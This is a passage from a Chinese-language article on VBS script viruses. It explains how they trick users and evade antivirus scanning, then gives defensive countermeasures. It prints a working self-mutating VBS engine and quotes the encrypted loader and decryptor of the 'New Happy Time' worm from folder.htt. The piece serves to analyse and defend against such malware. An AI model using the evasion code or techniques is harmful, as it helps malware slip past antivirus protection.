这种方式其实和用户的心理有关。譬如,病毒在发送附件时,采用双后缀的文件名,由于默认情况下,后缀并不显示,举个例子,文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg,这时用户往往会把它当成一张图片去点击。同样,对于用户自己磁盘中的文件,病毒在感染它们的时候,将原有文件的文件名作为前缀,vbs作为后缀产生一个病毒文件,并删除原来文件,这样,用户就有可能将这个vbs文件看作自己原来的文件运行。
4)desktop.ini和folder.htt互相配合
这两个文件可以用来配置活动桌面,也可以用来自定义文件夹。如果用户的目录中含有这两个文件,当用户进入该目录时,就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt,还可能触发exe文件,这也可能成为病毒得到控制权的一种有效方法!
病毒获得控制权的方法还有很多,这方面作者发挥的余地也比较大。
4.vbs脚本病毒对抗反病毒软件的几种技巧
病毒要生存,对抗反病毒软件的能力也是必需的。一般来说,vbs脚本病毒采用如下几种对抗反病毒软件的方法:
1)自加密
譬如,新欢乐时光病毒,它可以随机选取密钥对自己的部分代码进行加密变换,使得每次感染的病毒代码都不一样,达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术,使得每次感染后的加密病毒的解密后的代码都不一样。
下面看一个简单的vbs脚本变形引擎(来自flyshadow)
randomize
set of = createobject("scripting.filesystemobject") '创建文件系统对象
vc = of.opentextfile(wscript.scriptfullname, 1).readall '读取自身代码
fs = array("of", "vc", "fs", "fsc") '定义一个即将被替换字符的数组
for fsc = 0 to 3
vc = replace(vc, fs(fsc), chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65)) & chr((int(rnd * 22) + 65))) '取4个随机字符替换数组fs中的字符串
next
of.opentextfile(wscript.scriptfullname, 2, 1).writeline vc '将替换后的代码写回文件
上面这段代码使得该vbs文件在每次运行后,其of,vc,fs,fsc四字符串都会用随机字符串来代替,这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。
2)巧妙运用execute函数
用过vbs程序的朋友是否会觉得奇怪:当一个正常程序中用到了filesystemobject对象的时候,有些反病毒软件会在对这个程序进行扫描的时候报告说此vbs文件的风险为高,但是有些vbs脚本病毒同样采用了filesystemobject对象,为什么却又没有任何警告呢?原因很简单,就是因为这些病毒巧妙的运用了execute方法。有些杀毒软件检测vbs病毒时,会检查程序中是否声明使用了filesystemobject对象,如果采用了,这会发出报警。如果病毒将这段声明代码转化为字符串,然后通过execute(string)函数执行,就可以躲避某些反病毒软件。
3)改变某些对象的声明方法
譬如fso=createobject("scripting.filesystemobject"),我们将其改变为
fso=createobject("script"+"ing.filesyste"+"mobject"),这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。
4)直接关闭反病毒软件
vbs脚本功能强大,它可以直接在搜索用户进程然后对进程名进行比较,如果发现是反病毒软件的进程就直接关闭,并对它的某些关键程序进行删除。
5.vbs病毒生产机的原理介绍
所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议,其实对脚本病毒而言它的实现非常简单。
脚本语言是解释执行的、不需要编译,程序中不需要什么校验和定位,每条语句之间分隔得比较清楚。这样,先将病毒功能做成很多单独的模块,在用户做出病毒功能选择后,生产机只需要将相应的功能模块拼凑起来,最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因,这里不作详细介绍。
三、如何防范vbs脚本病毒
1.如何从样本中提取(加密)脚本病毒
对于没有加密的脚本病毒,我们可以直接从病毒样本中找出来,现在介绍一下如何从病毒样本中提取加密vbs脚本病毒,这里我们以新欢乐时光为例。
用jediedit打开folder.htt。我们发现这个文件总共才93行,第一行<body onload="vbscript:kj_start()">,几行注释后,以<html>开始,</html>节尾。相信每个人都知道这是个什么类型的文件吧!
第87行到91行,是如下语句:
87:<script language=vbscript>
88:exestring = "afi fkseboa)eqiiqbtq)s^pqbtq)aadobapfdj)>mlibl^gb`p)cpk...;后面省略,很长!
89:execute("dim keyarr(3),thistext"&vbcrlf&"keyarr(0) = 3"&vbcrlf&"keyarr(1) = 3"&vbcrlf&"keyarr(2) = 3"&vbcrlf&"keyarr(3) = 4"&vbcrlf&"for i=1 to len(exestring)"&vbcrlf&"tempnum = asc(mid(exestring,i,1))"&vbcrlf&"if tempnum = 18 then"&vbcrlf&"tempnum = 34"&vbcrlf&"end if"&vbcrlf&"tempchar = chr(tempnum + keyarr(i mod 4))"&vbcrlf&"if tempchar = chr(28) then"&vbcrlf&"tempchar = vbcr"&vbcrlf&"elseif tempchar = chr(29) then"&vbcrlf&"tempchar = vblf"&vbcrlf&"end if"&vbcrlf&"thistext = thistext & tempchar"&vbcrlf&"next") 90:execute(thistext) 91:</script>
第87和91行不用解释了,第88行是一个字符串的赋值,很明显这是被加密过的病毒代码。看看89行最后的一段代码thistext = thistext & tempchar,再加上下面那一行,我们肯定能够猜到thistext里面放的是病毒解密代码(熟悉vbs的兄弟当然也可以分析一下这段解密代码,too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才thistext中的那段代码(经过解密处理后的代码)。
那么,下一步该怎么做呢?很简单,我们只要在病毒代码解密之后,将thistext的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件:
首先,copy第88、89两行到刚才建立的.txt文件,当然如果你愿意看看新欢乐时光的执行效果,你也可以在最后输入第90行。然后在下面一行输入创建文件和将thistext写入文件vbs代码,整个文件如下所示:
exestring = "afi... ' 第88行代码 execute("dim keyar... ' 第89行代码
set fso=createobject("scripting.filesystemobject") ' 创建一个文件系统对象
set virusfile=fso.createtextfile("resource.log",true) ' 创建一个新文件resource.log,用以存放解密后的病毒代码 virusfile.writeline(thistext) ' 将解密后的代码写入resource.log
ok!就这么简单,保存文件,将该文件后缀名.txt改为.vbs(.vbe也可以),双击,你会发现该文件目录下多了一个文件resource.log,打开这个文件,怎么样?是不是“新欢乐时光”的源代码啊!
2.vbs脚本病毒的弱点
vbs脚本病毒由于其编写语言为脚本,因而它不会像pe文件那样方便灵活,它的运行是需要条件的(不过这种条件默认情况下就具备了)。笔者认为,vbs脚本病毒具有如下弱点:
1)绝大部分vbs脚本病毒运行的时候需要用到一个对象:filesystemobject
2)vbscript代码是通过windows script host来解释执行的。
3)vbs脚本病毒的运行需要其关联程序wscript.exe的支持。
4)通过网页传播的病毒需要activex的支持
5)通过email传播的病毒需要oe的自动发送邮件功能支持,但是绝大部分病毒都是以email为主要传播方式的。
3.如何预防和解除vbs脚本病毒
针对以上提到的vbs脚本病毒的弱点,笔者提出如下集中防范措施:
1)禁用文件系统对象filesystemobject
方法:用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是windows\system下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。
还有一种方法就是在注册表中hkey_classes_root\clsid\下找到一个主键{0d43fe01-f093-11cf-8940-00a0c9054228}的项,咔嚓即可。
2)卸载windows scripting host
在windows 98中(nt 4.0以上同理),打开[控制面板]→[添加/删除程序]→[windows安装程序]→[附件],取消“windows scripting host”一项。
和上面的方法一样,在注册表中hkey_classes_root\clsid\下找到一个主键{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}的项,咔嚓。
3)删除vbs、vbe、js、jse文件后缀名与应用程序的映射
点击[我的电脑]→[查看]→[文件夹选项]→[文件类型],然后删除vbs、vbe、js、jse文件后缀名与应用程序的映射。
4)在windows目录中,找到wscript.exe,更改名称或者删除,如果你觉得以后有机会用到的话,最好更改名称好了,当然以后也可以重新装上。
5)要彻底防治vbs网络蠕虫病毒,还需设置一下你的浏览器。我们首先打开浏览器,单击菜单栏里“internet 选项”安全选项卡里的[自定义级别]按钮。把“activex控件及插件”的一切设为禁用,这样就不怕了。呵呵,譬如新欢乐时光的那个activex组件如果不能运行,网络传播这项功能就玩完了。
6)禁止oe的自动收发邮件功能
7)由于蠕虫病毒大多利用文件扩展名作文章,所以要防范它就不要隐藏系统中已知文件类型的扩展名。windows默认的是“隐藏已知文件类型的扩展名称”,将其修改为显示所有文件类型的扩展名称。
8)将系统的网络连接的安全级别设置至少为“中等”,它可以在一定程度上预防某些有害的java程序或者某些activex组件对计算机的侵害。
9)呵呵,最后一项不说大家也应该知道了,杀毒软件确实很必要,尽管有些杀毒软件挺让广大用户失望,不过,选择是双方的哦。在这个病毒横飞的网络,如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。
四、对所有脚本类病毒发展的展望
随着网络的飞速发展,网络蠕虫病毒开始流行,而vbs脚本蠕虫则更加突出,不仅数量多,而且威力大。由于利用脚本编写病毒比较简单,除了将继续流行目前的vbs脚本病毒外,将会逐渐出现更多的其它脚本类病毒,譬如php,js,perl病毒等。
但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具,并且脚本病毒解除起来比较容易、相对容易防范。笔者认为,脚本病毒仍将继续流行,但是能够具有像爱虫、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。
上一篇: 电脑管家怎么查看QQ使用记录?
下一篇: iOS masonry的使用方法